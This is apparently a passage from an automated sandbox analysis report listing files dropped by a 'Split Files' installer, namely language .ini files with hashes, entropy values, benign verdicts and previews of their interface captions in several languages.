                MD5:4ABA9765EB3555788F5706D87A9D2DCA
                SHA1:36C0895FBF9F99690CA55C54CC56310E24513113
                SHA-256:E99B943206594C04BC0383669D04D4F191A501F46D2474FED08B997F8020B433
                SHA-512:3498485635AFC548663715D22071611BAB10C707E8E24BE0B5143EE4A27727DA7D18A5E6959E3F6DD7D0F615DDFD50CE9FC5CE8AE6DDC5BEE287B5A00A817288
                Malicious:false
                Preview:[Interface]....MFile->Caption = '...'..MExit->Caption =' ....'..MOptions->Caption = 'Options'..MSettings->Caption =' .........'..MLanguage->Caption =' ......'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption =' .......'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = '....'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption =' .......'..MAbout->Caption =' ...'....TabSheetSplit->Caption = ' ... .......'..TabSheetCombine->Caption = ' ...'....GroupBoxCombine->Caption =' ... .......'..LabelFirstFile->Caption = '..... .....:'..LabelOutput->Caption = '... ....:'..LabelCombineFolder->Caption =' .... ......:'..LabelSplitFolder->Caption = '.... ......:'..ButtonCombine->Caption =' ...'..ButtonStopCombine->Caption = '....'....GroupBoxSplit->Caption = '... .......'..LabelFileName->Caption =' ..... ...: '..LabelSplitFolder->Caption =' .... ......:'

                C:\Program Files (x86)\Split Files\language\Chinese.ini (copy)

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2345
                Entropy (8bit):5.847861612631974
                Encrypted:false
                SSDEEP:48:HGj2lE8qiTh7XJ9zHadtPTTD1n34q1jgun1ITq8K:HG5RDTln34qRgusK
                MD5:A5C9FEA89EFE8E2162BA477E8EA39B44
                SHA1:E6A2042C574D14786891F0C32F92C8292BBB4ACA
                SHA-256:8DDFB50DACA491296101BAB3DB9B77C7587127E684D9E22EFD6DC93F84A008FA
                SHA-512:3F7944F262717D308A1235982E741536DA6A4DF9ABEE4E2811E1151B53C3D31811EA3EB750ED39F347F7DF14AD20FF981C85CC2DA297BE745547B36D41B8FDB9
                Malicious:false
                Preview:[Interface]....MFile->Caption = '...(&F)'..MExit->Caption = '.......'..MOptions->Caption = '...'..MSettings->Caption = '....'..MLanguage->Caption = '....'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = '........'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = '....'..MAbout->Caption = '....'....TabSheetSplit->Caption = '...'..TabSheetCombine->Caption = '...'....GroupBoxCombine->Caption = ' .......... "......" .............'..LabelFirstFile->Caption = '......'..LabelOutput->Caption = '..........'..LabelCombineFolder->Caption = '.........'..LabelSplitFolder->Caption = '.........'..ButtonCombine->Caption = '...'..ButtonStopCombine->Caption = '..'....GroupBoxSplit->Caption = ' .......... "......."............. '..LabelFileName->Caption = '.

                C:\Program Files (x86)\Split Files\language\Dutch.ini (copy)

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2687
                Entropy (8bit):5.051567814097503
                Encrypted:false
                SSDEEP:48:HGgXRVA+sqgh59WJIo4yvHIExBMHkWREHZDNbHBsBOtiSZls5crRMfiE:HGusSgEvMHfREHN9hsoiOUBiE
                MD5:D2471D35D833E2544D67365E015E6153
                SHA1:497EE8FF9519D025BD10C5AA15DDC34DFB1B334B
                SHA-256:4831DDBCFE327E2542F4565E7A948C5828D71003B8444723E1E11BA6BB43ACE7
                SHA-512:C82B30D604A679F87B8D0B1670A0D1607E25150FFCFD1C9E631241916BA93CEB5A33AFCAA9080149096ACA1913791384860F5699F2BB302B6CB190AF777EB3CE
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Programma Afsluiten'..MOptions->Caption = 'Options'..MSettings->Caption = 'Instellingen'..MLanguage->Caption = 'Kies Taal'..MLangArabic->Caption = 'Arabisch'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Nederlands'..MLangEnglish->Caption = 'Engels'..MLangFrench->Caption = 'Frans'..MLangItalian->Caption = 'Italiaans'..MLangRussian->Caption = 'Russisch'..MLangSpanish->Caption = 'Spaans'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Hulp'..MAbout->Caption = 'Info'....TabSheetSplit->Caption = 'SPLITSEN'..TabSheetCombine->Caption = 'HERENIGEN'....GroupBoxCombine->Caption = ' Drag and drop een van de te herenigen delen in 'Eerste Deel' of browse ernaartoe '..LabelFirstFile->Caption = 'Eerste Deel:'..LabelOutput->Caption = 'Output Bestandsnaam:'..LabelCombineFolder->Caption = 'Output Map:'..LabelSplitFolder->Caption = 'Output Map:'..ButtonCombine->Caption = 'HERENIGEN'..ButtonStopCombine->Caption = 'STOP'....Grou

                C:\Program Files (x86)\Split Files\language\English.ini (copy)

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):2594
                Entropy (8bit):5.044497576650396
                Encrypted:false
                SSDEEP:48:HGgb5l+sqiTh7XJ9oVHo1xx0GHLVQ4ZWGAtDAEQmUDcQdWym:HGdpa1jfHLVQ4AGAtWma8H
                MD5:76776746B3CFF1CBD5D56CD44CA2DEF5
                SHA1:2F2ECA50BD7F72232BE84291EF1A7956C24098CC
                SHA-256:EC647D30931F50607CF745D958AAF0367CCEAB9999346188255CFBFB22301EE3
                SHA-512:202436C708D4F34FFCCDC3D33841246C5CEE073AC270DA547C15F9E995A08D36AE4C00982283BF60D62363046BBEAA0125D59075E4629A9D1934039CBFB00BE5
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Exit Application'..MOptions->Caption = 'Options'..MSettings->Caption = 'Settings'..MLanguage->Caption = 'Language'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Help'..MAbout->Caption = 'About'....TabSheetSplit->Caption = 'SPLIT'..TabSheetCombine->Caption = 'JOIN'....GroupBoxCombine->Caption = ' Drag and drop one of the files to join in the 'First Part' box or browse to it '..LabelFirstFile->Caption = 'First Part:'..LabelOutput->Caption = 'Output File Name:'..LabelCombineFolder->Caption = 'Output Folder:'..LabelSplitFolder->Caption = 'Output Folder:'..ButtonCombine->Caption = 'JOIN'..ButtonStopCombine->Caption = 'STOP'....GroupBoxSplit->Caption = ' Drag

                C:\Program Files (x86)\Split Files\language\French.ini (copy)

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2507
                Entropy (8bit):5.040552699764577
                Encrypted:false
                SSDEEP:48:HGkOA+sq/W7Yve3EkHaBSDbSljMM+v1/D3H:HGb8hABSDbSJMBD
                MD5:336D33F55222F48FBA19EF0911732766
                SHA1:E17A78E3B48192361DB540B1E8C9D0548C9A9FFE
                SHA-256:0E955453FA27CED0D0521F0F960C7743C2090F06263D33EC8FA978B681123E0C
                SHA-512:67EC6B859BCDD66DA59CDB1DC1A4EACFBDA12C57699012EE1573DD88F5AAAB6288E1BD9015C862689F4A1A27E83B28C3A9C99B1895EDF4F47D6F94B0557CDC1F
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&Fichier'..MExit->Caption = 'Quitter'..MOptions->Caption = 'Options'..MSettings->Caption = 'Settings'..MLanguage->Caption = 'Langage'..MLangArabic->Caption = 'Arabe'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Flamand'..MLangEnglish->Caption = 'Englais'..MLangFrench->Caption = 'Francais'..MLangItalian->Caption = 'Italien'..MLangRussian->Caption = 'Russe'..MLangSpanish->Caption = 'Espagnol'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Aide'..MAbout->Caption = 'A propos de ..'....TabSheetSplit->Caption = 'Scinder'..TabSheetCombine->Caption = 'Assembler'....GroupBoxCombine->Caption = ' Faire glisser un des fichiers bloc . assembler ou rechercher le par ... '..LabelFirstFile->Caption = 'Premier Fichier:'..LabelOutput->Caption = 'Fichier de sortie: '..LabelCombineFolder->Caption = 'R.pertoire Dest.'..LabelSplitFolder->Caption = 'R.pertoire Dest.'..ButtonCombine->Caption = 'Assembler'..ButtonStopCombine->Caption = 'Stop'....GroupBoxSpl

                C:\Program Files (x86)\Split Files\language\Italian.ini (copy)

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2729
                Entropy (8bit):5.029883215699414
                Encrypted:false
                SSDEEP:48:HGgS7++sqMsmQYEJK7bHExsA9GZ1MTn6btlOWH6r3zvX5c9WYN:HGjUoR9GXML6RYWH6rDRdYN
                MD5:8AFE543CB6791AA250312EBA61BF7C13
                SHA1:BFD229D43BE86728A634055AD65860157C2671BD
                SHA-256:AF5BFB663E715C48C55E24BC3BEA30FCAA9BE8EAF35133FBB75D54C5735696AC
                SHA-512:5CF85F84DD6D363B2AAC720CF10C5289350EB706DC2BF5CA824CF220C3607CC7969CDD2F4B2912DC97C7BE50CEDC24A9A01AFC585CE84B6B8CB81419153931A2
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Termina programma'..MOptions->Caption = 'Options'..MSettings->Caption = 'Impostazioni'..MLanguage->Caption = 'Seleziona Lingua'..MLangArabic->Caption = 'Arabo'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Olandese'..MLangEnglish->Caption = 'Inglese'..MLangFrench->Caption = 'Francese'..MLangItalian->Caption = 'Italiano'..MLangRussian->Caption = 'Russo'..MLangSpanish->Caption = 'Spagnolo'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Aiuto'..MAbout->Caption = 'Informazioni'....TabSheetSplit->Caption = 'DIVIDI'..TabSheetCombine->Caption = 'UNISCI'....GroupBoxCombine->Caption = ' Drag and drop una delle parti da unire nella casella 'Prima Parte' o segui percorso '..LabelFirstFile->Caption = 'Prima Parte:'..LabelOutput->Caption = 'Nome File Uscita:'..LabelCombineFolder->Caption = 'Cartella Uscita:'..LabelSplitFolder->Caption = 'Cartella Uscita:'..ButtonCombine->Caption = 'UNISCI'..ButtonStopCombine->Caption = '

                C:\Program Files (x86)\Split Files\language\Russian.ini (copy)

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2299
                Entropy (8bit):5.691502190790686
                Encrypted:false
                SSDEEP:48:HG9uhjkDYhqGQjsONHiHQgGU9dm6nclk6a1hg22mo6LD:HGnzLIQTUPmcclGsmogD
                MD5:F9F47FF3D866FFC4F38E315E41356E55
                SHA1:EFC313A99993B5FB8A454D4C5197C6F3965B5C89
                SHA-256:3A13CCE54190BF4A679D21F61466A0A18E9340287CAA1AA4EACB38C99C9D4957
                SHA-512:6EC1F1E19921C535A50254500ED01602DA74D3CC9E6DA8B5FC78D89255E42C5968BD294E56F584EE273630B9233C20CAFEBC906354CE393FE1CFFE91528F527A
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&....'..MExit->Caption = '.....'..MOptions->Caption = '.....'..MSettings->Caption = '.........'..MLanguage->Caption = '....'..MLangEnglish->Caption = '..........'..MLangRussian->Caption = '.......'..MLangArabic->Caption = '........'..MLangChinese->Caption = '.........'..MLangDutch->Caption = '.......'..MLangFrench->Caption = '...........'..MLangItalian->Caption = '...........'..MLangSpanish->Caption = '.........'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = '......'..MAbout->Caption = '. .........'....TabSheetSplit->Caption = '.......'..TabSheetCombine->Caption = '.......'....GroupBoxCombine->Caption = ' ....... ..... '..LabelFirstFile->Caption = '1-. ....:'..LabelOutput->Caption = '........: '..LabelCombineFolder->Caption = '..........:'..ButtonCombine->Caption = '.......'..ButtonStopCombine->Caption = '....'....GroupBoxSplit->Caption = ' ....... .... '..LabelSplitFolder->Caption = '..........:'..LabelFileName->Caption = '... .....:'..LabelFile

                C:\Program Files (x86)\Split Files\language\Spanish.ini (copy)

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2718
                Entropy (8bit):5.057121428169199
                Encrypted:false
                SSDEEP:48:HGPWFaxAA+sqKvFYLcunHh3QxXOBp1OB5r70h3CGRsJE0laDwXCqXH5wGF5JoCPa:HGPAPZBAJU1k7Jb245xVfUMG
                MD5:21B4D47F5D851271C89310C92777FB70
                SHA1:9D85FF8F7107CFAE3F31993FAF7F249591AFCB27
                SHA-256:D88AE9E292EBC4E56767892FD451E2E8278FCE776CAD689731EE7875748D55D7
                SHA-512:46F26B51D6959A36E33266887E39CB98E7E67880052DE8DE741CB93C90ED3B28C87A224CE710E6C698FE648ED8B062E73DEDC253A6C5A8362EB3EF2792AB4FBF
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&Archivo'..MExit->Caption = 'Salir'..MOptions->Caption = 'Options'..MSettings->Caption = 'Herramientas'..MLanguage->Caption = 'Elegir idioma'..MLangArabic->Caption = 'Arabe'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Holand.s'..MLangEnglish->Caption = 'Ingl.s'..MLangFrench->Caption = 'Franc.s'..MLangItalian->Caption = 'Italiano'..MLangRussian->Caption = 'Ruso'..MLangSpanish->Caption = 'Espa.ol'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Ayuda'..MAbout->Caption = 'Sobre programa'....TabSheetSplit->Caption = 'SEPARAR'..TabSheetCombine->Caption = 'JUNTAR'....GroupBoxCombine->Caption = ' Drag and drop una de las partes para juntar en la celda 'Primera Parte' o navegar '..LabelFirstFile->Caption = 'Primera Parte:'..LabelOutput->Caption = 'Nombre Archivo salida:'..LabelCombineFolder->Caption = 'Carpeta salida:'..LabelSplitFolder->Caption = 'Carpeta salida:'..ButtonCombine->Caption = 'JUNTAR'..ButtonStopCombine->Caption = 'PARAR'....

                C:\Program Files (x86)\Split Files\language\Turkish.ini (copy)

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2607
                Entropy (8bit):5.234177949162883
                Encrypted:false
                SSDEEP:48:HGUyjEiB0w3l+sqiTh7XJ9UeHjIDt00AoB/nheSSMpSSSxPYe:HGpNBrkGIDt0qnheS9Sx
                MD5:E1271E0DDD609CD7F9C2367D32FEBE4B
                SHA1:0A420424F1FADE0BFF002E63AAD22B5E94B86CAC
                SHA-256:AEE6B1EDFFFCE507E2207C7E2AA36DA42B2AC54CEB28B9759B2D05F1012CBA8F
                SHA-512:86A11C9E4B59F2437180F56CAD44E69CB29B03B93983EA5E35CBCC5BDD40CFC424EE1EEF519B2E44D67623C79835AF92B4B089AC29890C046CD590C1F8BFA574
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&Dosya'..MExit->Caption = 'Uygulamay. Kapat'..MOptions->Caption = 'Se.enekler'..MSettings->Caption = 'Ayarlar'..MLanguage->Caption = 'Dil'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Yard.m'..MAbout->Caption = 'Hakk.nda'....TabSheetSplit->Caption = 'PAR.ALA'..TabSheetCombine->Caption = 'B.RLE.T.R'....GroupBoxCombine->Caption = ' .lk par.ay. s.r.kleyin yada g.zat. kullan.n '..LabelFirstFile->Caption = '.lk Par.a:'..LabelOutput->Caption = 'Birle.tirme Ad.:'..LabelCombineFolder->Caption = '..kt. Klas.r.:'..LabelSplitFolder->Caption = '..kt. Klas.r.:'..ButtonCombine->Caption = 'B.RLE.T.R'..ButtonStopCombine->Caption = 'DUR'....GroupBoxSplit->Caption = ' B.lmek istedi.iniz dosyay.

                C:\Program Files (x86)\Split Files\language\is-2PF6K.tmp

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2729
                Entropy (8bit):5.029883215699414
                Encrypted:false
                SSDEEP:48:HGgS7++sqMsmQYEJK7bHExsA9GZ1MTn6btlOWH6r3zvX5c9WYN:HGjUoR9GXML6RYWH6rDRdYN
                MD5:8AFE543CB6791AA250312EBA61BF7C13
                SHA1:BFD229D43BE86728A634055AD65860157C2671BD
                SHA-256:AF5BFB663E715C48C55E24BC3BEA30FCAA9BE8EAF35133FBB75D54C5735696AC
                SHA-512:5CF85F84DD6D363B2AAC720CF10C5289350EB706DC2BF5CA824CF220C3607CC7969CDD2F4B2912DC97C7BE50CEDC24A9A01AFC585CE84B6B8CB81419153931A2
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&File'..MExit->Caption = 'Termina programma'..MOptions->Caption = 'Options'..MSettings->Caption = 'Impostazioni'..MLanguage->Caption = 'Seleziona Lingua'..MLangArabic->Caption = 'Arabo'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Olandese'..MLangEnglish->Caption = 'Inglese'..MLangFrench->Caption = 'Francese'..MLangItalian->Caption = 'Italiano'..MLangRussian->Caption = 'Russo'..MLangSpanish->Caption = 'Spagnolo'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Aiuto'..MAbout->Caption = 'Informazioni'....TabSheetSplit->Caption = 'DIVIDI'..TabSheetCombine->Caption = 'UNISCI'....GroupBoxCombine->Caption = ' Drag and drop una delle parti da unire nella casella 'Prima Parte' o segui percorso '..LabelFirstFile->Caption = 'Prima Parte:'..LabelOutput->Caption = 'Nome File Uscita:'..LabelCombineFolder->Caption = 'Cartella Uscita:'..LabelSplitFolder->Caption = 'Cartella Uscita:'..ButtonCombine->Caption = 'UNISCI'..ButtonStopCombine->Caption = '

                C:\Program Files (x86)\Split Files\language\is-3OLEK.tmp

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2299
                Entropy (8bit):5.691502190790686
                Encrypted:false
                SSDEEP:48:HG9uhjkDYhqGQjsONHiHQgGU9dm6nclk6a1hg22mo6LD:HGnzLIQTUPmcclGsmogD
                MD5:F9F47FF3D866FFC4F38E315E41356E55
                SHA1:EFC313A99993B5FB8A454D4C5197C6F3965B5C89
                SHA-256:3A13CCE54190BF4A679D21F61466A0A18E9340287CAA1AA4EACB38C99C9D4957
                SHA-512:6EC1F1E19921C535A50254500ED01602DA74D3CC9E6DA8B5FC78D89255E42C5968BD294E56F584EE273630B9233C20CAFEBC906354CE393FE1CFFE91528F527A
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&....'..MExit->Caption = '.....'..MOptions->Caption = '.....'..MSettings->Caption = '.........'..MLanguage->Caption = '....'..MLangEnglish->Caption = '..........'..MLangRussian->Caption = '.......'..MLangArabic->Caption = '........'..MLangChinese->Caption = '.........'..MLangDutch->Caption = '.......'..MLangFrench->Caption = '...........'..MLangItalian->Caption = '...........'..MLangSpanish->Caption = '.........'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = '......'..MAbout->Caption = '. .........'....TabSheetSplit->Caption = '.......'..TabSheetCombine->Caption = '.......'....GroupBoxCombine->Caption = ' ....... ..... '..LabelFirstFile->Caption = '1-. ....:'..LabelOutput->Caption = '........: '..LabelCombineFolder->Caption = '..........:'..ButtonCombine->Caption = '.......'..ButtonStopCombine->Caption = '....'....GroupBoxSplit->Caption = ' ....... .... '..LabelSplitFolder->Caption = '..........:'..LabelFileName->Caption = '... .....:'..LabelFile

                C:\Program Files (x86)\Split Files\language\is-7QVA3.tmp

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2507
                Entropy (8bit):5.040552699764577
                Encrypted:false
                SSDEEP:48:HGkOA+sq/W7Yve3EkHaBSDbSljMM+v1/D3H:HGb8hABSDbSJMBD
                MD5:336D33F55222F48FBA19EF0911732766
                SHA1:E17A78E3B48192361DB540B1E8C9D0548C9A9FFE
                SHA-256:0E955453FA27CED0D0521F0F960C7743C2090F06263D33EC8FA978B681123E0C
                SHA-512:67EC6B859BCDD66DA59CDB1DC1A4EACFBDA12C57699012EE1573DD88F5AAAB6288E1BD9015C862689F4A1A27E83B28C3A9C99B1895EDF4F47D6F94B0557CDC1F
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&Fichier'..MExit->Caption = 'Quitter'..MOptions->Caption = 'Options'..MSettings->Caption = 'Settings'..MLanguage->Caption = 'Langage'..MLangArabic->Caption = 'Arabe'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Flamand'..MLangEnglish->Caption = 'Englais'..MLangFrench->Caption = 'Francais'..MLangItalian->Caption = 'Italien'..MLangRussian->Caption = 'Russe'..MLangSpanish->Caption = 'Espagnol'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Aide'..MAbout->Caption = 'A propos de ..'....TabSheetSplit->Caption = 'Scinder'..TabSheetCombine->Caption = 'Assembler'....GroupBoxCombine->Caption = ' Faire glisser un des fichiers bloc . assembler ou rechercher le par ... '..LabelFirstFile->Caption = 'Premier Fichier:'..LabelOutput->Caption = 'Fichier de sortie: '..LabelCombineFolder->Caption = 'R.pertoire Dest.'..LabelSplitFolder->Caption = 'R.pertoire Dest.'..ButtonCombine->Caption = 'Assembler'..ButtonStopCombine->Caption = 'Stop'....GroupBoxSpl

                C:\Program Files (x86)\Split Files\language\is-7R5M5.tmp

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2266
                Entropy (8bit):5.4593359267896355
                Encrypted:false
                SSDEEP:48:HG8il+sqirh7zJ9YTHskp1r4phFAqLNnK9h:HGkSkp1r4NTKf
                MD5:4ABA9765EB3555788F5706D87A9D2DCA
                SHA1:36C0895FBF9F99690CA55C54CC56310E24513113
                SHA-256:E99B943206594C04BC0383669D04D4F191A501F46D2474FED08B997F8020B433
                SHA-512:3498485635AFC548663715D22071611BAB10C707E8E24BE0B5143EE4A27727DA7D18A5E6959E3F6DD7D0F615DDFD50CE9FC5CE8AE6DDC5BEE287B5A00A817288
                Malicious:false
                Preview:[Interface]....MFile->Caption = '...'..MExit->Caption =' ....'..MOptions->Caption = 'Options'..MSettings->Caption =' .........'..MLanguage->Caption =' ......'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption =' .......'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = '....'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption =' .......'..MAbout->Caption =' ...'....TabSheetSplit->Caption = ' ... .......'..TabSheetCombine->Caption = ' ...'....GroupBoxCombine->Caption =' ... .......'..LabelFirstFile->Caption = '..... .....:'..LabelOutput->Caption = '... ....:'..LabelCombineFolder->Caption =' .... ......:'..LabelSplitFolder->Caption = '.... ......:'..ButtonCombine->Caption =' ...'..ButtonStopCombine->Caption = '....'....GroupBoxSplit->Caption = '... .......'..LabelFileName->Caption =' ..... ...: '..LabelSplitFolder->Caption =' .... ......:'

                C:\Program Files (x86)\Split Files\language\is-AFEG0.tmp

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2345
                Entropy (8bit):5.847861612631974
                Encrypted:false
                SSDEEP:48:HGj2lE8qiTh7XJ9zHadtPTTD1n34q1jgun1ITq8K:HG5RDTln34qRgusK
                MD5:A5C9FEA89EFE8E2162BA477E8EA39B44
                SHA1:E6A2042C574D14786891F0C32F92C8292BBB4ACA
                SHA-256:8DDFB50DACA491296101BAB3DB9B77C7587127E684D9E22EFD6DC93F84A008FA
                SHA-512:3F7944F262717D308A1235982E741536DA6A4DF9ABEE4E2811E1151B53C3D31811EA3EB750ED39F347F7DF14AD20FF981C85CC2DA297BE745547B36D41B8FDB9
                Malicious:false
                Preview:[Interface]....MFile->Caption = '...(&F)'..MExit->Caption = '.......'..MOptions->Caption = '...'..MSettings->Caption = '....'..MLanguage->Caption = '....'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = '........'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = '....'..MAbout->Caption = '....'....TabSheetSplit->Caption = '...'..TabSheetCombine->Caption = '...'....GroupBoxCombine->Caption = ' .......... "......" .............'..LabelFirstFile->Caption = '......'..LabelOutput->Caption = '..........'..LabelCombineFolder->Caption = '.........'..LabelSplitFolder->Caption = '.........'..ButtonCombine->Caption = '...'..ButtonStopCombine->Caption = '..'....GroupBoxSplit->Caption = ' .......... "......."............. '..LabelFileName->Caption = '.

                C:\Program Files (x86)\Split Files\language\is-B5MB3.tmp

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2607
                Entropy (8bit):5.234177949162883
                Encrypted:false
                SSDEEP:48:HGUyjEiB0w3l+sqiTh7XJ9UeHjIDt00AoB/nheSSMpSSSxPYe:HGpNBrkGIDt0qnheS9Sx
                MD5:E1271E0DDD609CD7F9C2367D32FEBE4B
                SHA1:0A420424F1FADE0BFF002E63AAD22B5E94B86CAC
                SHA-256:AEE6B1EDFFFCE507E2207C7E2AA36DA42B2AC54CEB28B9759B2D05F1012CBA8F
                SHA-512:86A11C9E4B59F2437180F56CAD44E69CB29B03B93983EA5E35CBCC5BDD40CFC424EE1EEF519B2E44D67623C79835AF92B4B089AC29890C046CD590C1F8BFA574
                Malicious:false
                Preview:[Interface]....MFile->Caption = '&Dosya'..MExit->Caption = 'Uygulamay. Kapat'..MOptions->Caption = 'Se.enekler'..MSettings->Caption = 'Ayarlar'..MLanguage->Caption = 'Dil'..MLangArabic->Caption = 'Arabic'..MLangChinese->Caption = 'Chinese'..MLangDutch->Caption = 'Dutch'..MLangEnglish->Caption = 'English'..MLangFrench->Caption = 'French'..MLangItalian->Caption = 'Italian'..MLangRussian->Caption = 'Russian'..MLangSpanish->Caption = 'Spanish'..MLangTurkish->Caption = 'Turkish'..MHelp->Caption = 'Yard.m'..MAbout->Caption = 'Hakk.nda'....TabSheetSplit->Caption = 'PAR.ALA'..TabSheetCombine->Caption = 'B.RLE.T.R'....GroupBoxCombine->Caption = ' .lk par.ay. s.r.kleyin yada g.zat. kullan.n '..LabelFirstFile->Caption = '.lk Par.a:'..LabelOutput->Caption = 'Birle.tirme Ad.:'..LabelCombineFolder->Caption = '..kt. Klas.r.:'..LabelSplitFolder->Caption = '..kt. Klas.r.:'..ButtonCombine->Caption = 'B.RLE.T.R'..ButtonStopCombine->Caption = 'DUR'....GroupBoxSplit->Caption = ' B.lmek istedi.iniz dosyay.

                C:\Program Files (x86)\Split Files\language\is-CSEUG.tmp

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2687
                Entropy (8bit):5.051567814097503
                Encrypted:false
                SSDEEP:48:HGgXRVA+sqgh59WJIo4yvHIExBMHkWREHZDNbHBsBOtiSZls5crRMfiE:HGusSgEvMHfREHN9hsoiOUBiE
                MD5:D2471D35D833E2544D67365E015E6153
                SHA1:497EE8FF9519D025BD10C5AA15DDC34DFB1B334B
                SHA-256:4831DDBCFE327E2542F4565E7A948C5828D71003B8444723E1E11BA6BB43ACE7
                SHA-512:C82B30D604A679F87B8D0B1670A0D1607E25150FFCFD1C9E631241916BA93CEB5A33AFCAA9080149096ACA1913791384860F5699F2BB302B6CB190AF777EB3CE
                Malicious:false
